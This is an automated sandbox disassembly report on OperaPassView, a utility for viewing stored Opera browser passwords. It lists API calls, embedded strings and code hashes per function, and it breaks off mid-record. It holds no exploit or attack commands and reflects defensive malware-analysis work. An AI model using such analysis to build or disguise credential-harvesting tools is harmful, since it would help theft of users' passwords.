                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Window$ItemRect$ClientFocusPoints
                                        • String ID:
                                        • API String ID: 2702700334-0
                                        • Opcode ID: a85f5d6972250b487f189912b8203cb154522be3c771e050ceb9a77a4a5c8d1d
                                        • Instruction ID: 4c80671100bc7487ec600a80e72f158d44a53e1a999341b5ac59c428e69ca6c6
                                        • Opcode Fuzzy Hash: a85f5d6972250b487f189912b8203cb154522be3c771e050ceb9a77a4a5c8d1d
                                        • Instruction Fuzzy Hash: 5001DB31500308FBDB105B75DC89FAB7BADDBC9765F10052AF904BB250DB74ED018AA4
                                        APIs
                                        • wcscpy.MSVCRT ref: 0040AFCC
                                        • wcscat.MSVCRT ref: 0040AFDB
                                        • wcscat.MSVCRT ref: 0040AFEC
                                        • wcscat.MSVCRT ref: 0040AFFB
                                        • 74D41560.VERSION(?,?,00000000,?), ref: 0040B015
                                          • Part of subcall function 00403BFD: wcslen.MSVCRT ref: 00403C04
                                          • Part of subcall function 00403BFD: memcpy.MSVCRT(?,?,000000FF,?,0040B032,00000000,?,?,?,00000000,?), ref: 00403C1A
                                          • Part of subcall function 00403C7C: lstrcpyW.KERNEL32(?,?,0040B03A,?,?,?,00000000,?), ref: 00403C91
                                          • Part of subcall function 00403C7C: lstrlenW.KERNEL32(?), ref: 00403C98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscat$D41560lstrcpylstrlenmemcpywcscpywcslen
                                        • String ID: \StringFileInfo\
                                        • API String ID: 1466122427-2245444037
                                        • Opcode ID: 324682729d8186604e729f484209650df35c4949d97cda78b875cec455760db2
                                        • Instruction ID: f8ce8c5ff0c9cfaa06592da41163ef34e863ac78dd4625ffd6bbac5636820e08
                                        • Opcode Fuzzy Hash: 324682729d8186604e729f484209650df35c4949d97cda78b875cec455760db2
                                        • Instruction Fuzzy Hash: B2015E7290020CAACB10EAA1CC46EDF776CDB04304F000576B564F2092EF39DA8A9B9D
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintfwcscpy
                                        • String ID: dialog_%d$general$menu_%d$strings
                                        • API String ID: 999028693-502967061
                                        • Opcode ID: 0933e8eb2af049f5224fd0a0279fc28b9d9fee4c80c44f955a7bbbc898aac174
                                        • Instruction ID: d7c126390a0a95e70c8d303e7ee891c4f76a78e8e38c5110ed71e63c4d85d429
                                        • Opcode Fuzzy Hash: 0933e8eb2af049f5224fd0a0279fc28b9d9fee4c80c44f955a7bbbc898aac174
                                        • Instruction Fuzzy Hash: 78E0E6B1FC830075DD5011D59C53B1B2541ABD5B24F704877F746B05D1E6BDA89425CF
                                        APIs
                                        • memchr.MSVCRT ref: 0040B43F
                                        • memcpy.MSVCRT(?,0040C790,0000000B), ref: 0040B4E7
                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 0040B4F7
                                        • memcpy.MSVCRT(?,?,00000010,?,?), ref: 0040B51D
                                        • memcpy.MSVCRT(?,0040C790,0000000B), ref: 0040B52D
                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 0040B53D
                                        • memcpy.MSVCRT(?,?,00000008,?,?), ref: 0040B593
                                        • memset.MSVCRT ref: 0040B5E5
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy$memchrmemset
                                        • String ID:
                                        • API String ID: 1581201632-0
                                        • Opcode ID: f60f60e2365ed897c929b8c74f0fd997f1cd53ae9cc400f4c443353e134ed1ba
                                        • Instruction ID: 01e1e0abaa7c517d468a3621524a070298f9ba8d4cbfca9af77019fa2c654f59
                                        • Opcode Fuzzy Hash: f60f60e2365ed897c929b8c74f0fd997f1cd53ae9cc400f4c443353e134ed1ba
                                        • Instruction Fuzzy Hash: BB51B3725143455BC710DE69C881EABB7E8EB84304F040D3FF995D7282E739EA09C7AA
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00409A15,00000000,00000000), ref: 00409DA0
                                        • memset.MSVCRT ref: 00409E02
                                        • memset.MSVCRT ref: 00409E12
                                          • Part of subcall function 00409C7F: wcscpy.MSVCRT ref: 00409CA8
                                        • memset.MSVCRT ref: 00409EFD
                                        • wcscpy.MSVCRT ref: 00409F1E
                                        • CloseHandle.KERNEL32(?,00409A15,?,?,?,00409A15,00000000,00000000), ref: 00409F74
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                        • String ID:
                                        • API String ID: 3300951397-0
                                        • Opcode ID: db29b1a15ab221589b072cade464e9f57ecbfdb672e9c3838357f40fba68a12d
                                        • Instruction ID: ed0b31324ba2f07f6e5e15296f4eb4d60d58a6fc9675b4e9f40aac7df0c1affd
                                        • Opcode Fuzzy Hash: db29b1a15ab221589b072cade464e9f57ecbfdb672e9c3838357f40fba68a12d
                                        • Instruction Fuzzy Hash: 0A516D71108345AFD720DF25C884A9FBBE8FF84304F004A2EF589E2291DB75D944CBAA
                                        APIs
                                        • memset.MSVCRT ref: 00407EA3
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,00000400,?,004020A6,OperaPassView), ref: 00404A1E
                                          • Part of subcall function 004049DF: LoadStringW.USER32(00000000,00000006,?,00000400), ref: 00404AB7
                                          • Part of subcall function 004049DF: memcpy.MSVCRT(00000000,00000002,?,004020A6,OperaPassView), ref: 00404AF7
                                          • Part of subcall function 004049DF: wcscpy.MSVCRT ref: 00404A60
                                          • Part of subcall function 004049DF: wcslen.MSVCRT ref: 00404A7E
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,?,?,004020A6,OperaPassView), ref: 00404A8C
                                          • Part of subcall function 004043C3: memset.MSVCRT ref: 004043E4
                                          • Part of subcall function 004043C3: _snwprintf.MSVCRT ref: 00404417
                                          • Part of subcall function 004043C3: wcslen.MSVCRT ref: 00404423
                                          • Part of subcall function 004043C3: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),0040D934,?,?,?,00000000), ref: 0040443B
                                          • Part of subcall function 004043C3: wcslen.MSVCRT ref: 00404449
                                          • Part of subcall function 004043C3: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),0040D934,?,?,?,00000000), ref: 0040445C
                                          • Part of subcall function 00404208: wcscpy.MSVCRT ref: 0040426E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2618321458-3614832568
                                        • Opcode ID: fa6aac4af9a437cf9dfdff43ae2e0e7df4d45df21183e3b5f77e80c00bc9b2de
                                        • Instruction ID: 7557137d6e321005020f6f1fadc05ab8639f5b3343127878cbcf5c5923e4d1d4
                                        • Opcode Fuzzy Hash: fa6aac4af9a437cf9dfdff43ae2e0e7df4d45df21183e3b5f77e80c00bc9b2de
                                        • Instruction Fuzzy Hash: F73130F1D0021D9FDB40EFA5D882ADE7BB4FB44318F10417BE649BB281DB385A558B98
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00401677
                                        • GetSystemMetrics.USER32(00000015), ref: 00401685
                                        • GetSystemMetrics.USER32(00000014), ref: 00401691
                                        • BeginPaint.USER32(?,?), ref: 004016AB
                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016BA
                                        • EndPaint.USER32(?,?), ref: 004016C7
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                        • String ID:
                                        • API String ID: 19018683-0
                                        • Opcode ID: 2cb91dd7ddc020dc7075c663e85983b846ce3e7c7572fcf6cde57d9b21bee265
                                        • Instruction ID: 8457468c7a12c04a8a2756ab15cf5a6a7ead8c4fdf81a6fa8c14e0d140124ace
                                        • Opcode Fuzzy Hash: 2cb91dd7ddc020dc7075c663e85983b846ce3e7c7572fcf6cde57d9b21bee265
                                        • Instruction Fuzzy Hash: DD012872900218EFDF04DFA8DD989AF7BB9FB49701F000529AA11AA195DA71A904CF90
                                        APIs
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        • memset.MSVCRT ref: 00406A5F
                                           • Part of subcall function 0040ABF1: memcpy.MSVCRT(?,<,00000008,?,?,00000000,00406A80,?,?), ref: 0040AC6E
                                          • Part of subcall function 00406327: wcscpy.MSVCRT ref: 0040632C
                                          • Part of subcall function 00406327: _wcslwr.MSVCRT ref: 0040635F
                                        • _snwprintf.MSVCRT ref: 00406AA9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 2236007434-2769808009
                                        • Opcode ID: 1c4dfc45c64888dcd19906e1ce87c119c460b1c8613f51e5e6cc6a97c9452b99
                                        • Instruction ID: 532fc3798995e24f7969d992cf274a640e06e6b710a7d6fa20a9e01b27acc6bf
                                        • Opcode Fuzzy Hash: 1c4dfc45c64888dcd19906e1ce87c119c460b1c8613f51e5e6cc6a97c9452b99
                                        • Instruction Fuzzy Hash: DE118232900219BFDB10AF55DC86E99BB65FF04318F10402AF905765E2D775B964DBC8
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408A6D
                                        • RegisterClassW.USER32(?), ref: 00408A92
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00408A99
                                        • CreateWindowExW.USER32(00000000,OperaPassView,OperaPassView,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00408AB8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                        • String ID: OperaPassView
                                        • API String ID: 2678498856-491582363
                                        • Opcode ID: ebee921cd340d24d1c112a0114619ca97e70da3c529be146949097683970dde6
                                        • Instruction ID: 6139fefc9463364463f6ba3dac0f6dfd072d0918ab9cedadf57f00407217c3e7
                                        • Opcode Fuzzy Hash: ebee921cd340d24d1c112a0114619ca97e70da3c529be146949097683970dde6
                                        • Instruction Fuzzy Hash: BD01C8B1901229BBD7119F998D89ADFBEBCFF09750F104216F514F2241D7B45A40CBE9
                                        APIs
                                        • memset.MSVCRT ref: 00406C27
                                        • memset.MSVCRT ref: 00406C3E
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                          • Part of subcall function 00406327: wcscpy.MSVCRT ref: 0040632C
                                          • Part of subcall function 00406327: _wcslwr.MSVCRT ref: 0040635F
                                        • _snwprintf.MSVCRT ref: 00406C7A
                                        Strings
                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00406C43
                                        • <%s>, xrefs: 00406C69
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                        • API String ID: 168708657-1998499579
                                        • Opcode ID: d4fec9760c6bce6f9e22fa121f8f1f1fb7164566b64fe3a51784db92f15cfb28
                                        • Instruction ID: 659f90def2f8e6d2578ba1f6b517c8c342f70bbf21c1d70c407bd2e86063c475
                                        • Opcode Fuzzy Hash: d4fec9760c6bce6f9e22fa121f8f1f1fb7164566b64fe3a51784db92f15cfb28
                                        • Instruction Fuzzy Hash: AF0144F2D401197BDB20AB55CC46FEA7A6CEF44308F0004B6BA08B60D2D7789A558A9D
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessage_snwprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 313946961-1552265934
                                        • Opcode ID: dfb88c5729f0bf346466b19c2265fac6ab5e7b0b149df898466e0d6eeb2203f1
                                        • Instruction ID: 8058225859fe7cde546f22b942a46c42c63a718d5ea86f2e76bade30defb87b6
                                        • Opcode Fuzzy Hash: dfb88c5729f0bf346466b19c2265fac6ab5e7b0b149df898466e0d6eeb2203f1
                                        • Instruction Fuzzy Hash: D4F0A7B6540108A6DB11AB95CC46FDA77ECEB48791F0401BBB604B31C1EBB4AA448EAD
                                        APIs
                                        • wcscpy.MSVCRT ref: 0040A6B6
                                        • wcscpy.MSVCRT ref: 0040A6C7
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,004081ED,?), ref: 0040A6E5
                                        • CloseHandle.KERNEL32(00000000), ref: 0040A6EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$CloseCreateFileHandle
                                        • String ID: General
                                        • API String ID: 999786162-26480598
                                        • Opcode ID: 5a1bcd6ee0fbd5839e7ab1779c391e91d176d6b31a9065dfd3aae4479c58490c
                                        • Instruction ID: 80fd9d1d714720778e2857487aaf7ea67508ef76b285aa25bafc728f417c3cc9
                                        • Opcode Fuzzy Hash: 5a1bcd6ee0fbd5839e7ab1779c391e91d176d6b31a9065dfd3aae4479c58490c
                                        • Instruction Fuzzy Hash: A2E09AB2800211BFE3117B708C59FBF7A9DDB54300F44C83AF95AF2191EA398C5596AE
                                        APIs
                                        • LoadLibraryW.KERNEL32(shlwapi.dll,000003EE,75C08FB0,00403210,00000000), ref: 0040AB8F
                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AB9D
                                        • FreeLibrary.KERNEL32(00000000), ref: 0040ABB5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: SHAutoComplete$shlwapi.dll
                                        • API String ID: 145871493-1506664499
                                        • Opcode ID: 2b13cbe4fa976587dba015ac8bc7e92f1ca77d962969a3839d1cb2f9d6140f48
                                        • Instruction ID: 813b35556bdf0c8ed5bc459e2582449ca7e4d1046522a84e24813c778febaec3
                                        • Opcode Fuzzy Hash: 2b13cbe4fa976587dba015ac8bc7e92f1ca77d962969a3839d1cb2f9d6140f48
                                        • Instruction Fuzzy Hash: 3BD05E35310210EFE651AB66AC88EAF3EA6EFC17617054532FD14F2290CB7C8D16C56A
                                        APIs
                                        • GetSystemMetrics.USER32(00000011), ref: 0040400F
                                        • GetSystemMetrics.USER32(00000010), ref: 00404015
                                        • 73A1A570.USER32(00000000), ref: 00404023
                                        • GetWindowRect.USER32(?,?), ref: 00404054
                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00404099
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MetricsSystemWindow$A570MoveRect
                                        • String ID:
                                        • API String ID: 3431177557-0
                                        • Opcode ID: 641c8072e981fec5d1e71fc20bd1791d30322c2871cf8ebdd159e8e3a321cb4d
                                        • Instruction ID: 610676b9c3bbbd6da2c0a9868555fe1c154ba3de3cec7fd67c201bf81deea94b
                                        • Opcode Fuzzy Hash: 641c8072e981fec5d1e71fc20bd1791d30322c2871cf8ebdd159e8e3a321cb4d
                                        • Instruction Fuzzy Hash: 71119072A00119EFDB109BB88E49AAF7FB9EB84351F050135AE05F7290DA70AD018AA0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: @$@
                                        • API String ID: 3510742995-149943524
                                        • Opcode ID: 1ec03dd1ac256bf16cb5de4bbe2812bc9e32fdbb007d750df983ae5fdb8a89b1
                                        • Instruction ID: 1de6c34288c87ebc42d99fb55654b1b16bed35321dec598d18253807e7cc7791
                                        • Opcode Fuzzy Hash: 1ec03dd1ac256bf16cb5de4bbe2812bc9e32fdbb007d750df983ae5fdb8a89b1
                                        • Instruction Fuzzy Hash: E3112BF2900709ABCB348E65D88086A77A9EF90354B00063FF906A72D2E735DE59C6DC
                                        APIs
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057AE
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057BC
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057CD
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057E4
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057ED
                                        • ??3@YAXPAX@Z.MSVCRT(?,0040C3F0,00408429,00000000,00408D28,00000000,00000000,00000000,?,?,?,?,00408E6D,/deleteregkey,/savelangfile), ref: 00405823
                                        • ??3@YAXPAX@Z.MSVCRT(?,0040C3F0,00408429,00000000,00408D28,00000000,00000000,00000000,?,?,?,?,00408E6D,/deleteregkey,/savelangfile), ref: 00405836
                                        • ??3@YAXPAX@Z.MSVCRT(?,0040C3F0,00408429,00000000,00408D28,00000000,00000000,00000000,?,?,?,?,00408E6D,/deleteregkey,/savelangfile), ref: 00405849
                                        • ??3@YAXPAX@Z.MSVCRT(?,0040C3F0,00408429,00000000,00408D28,00000000,00000000,00000000,?,?,?,?,00408E6D,/deleteregkey,/savelangfile), ref: 0040585C
                                        • free.MSVCRT ref: 00405895
                                          • Part of subcall function 0040459C: free.MSVCRT ref: 004045A3
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID:
                                        • API String ID: 2241099983-0
                                        • Opcode ID: 261b58cf0eec15e2e1794024efc3ddad4b6e1d3671ff6baf08edaa83f7d118c1
                                        • Instruction ID: 193f175e968b488bcaaaedab1f0f4d2e62d6444421283c25a59f15cf00c5d2b1
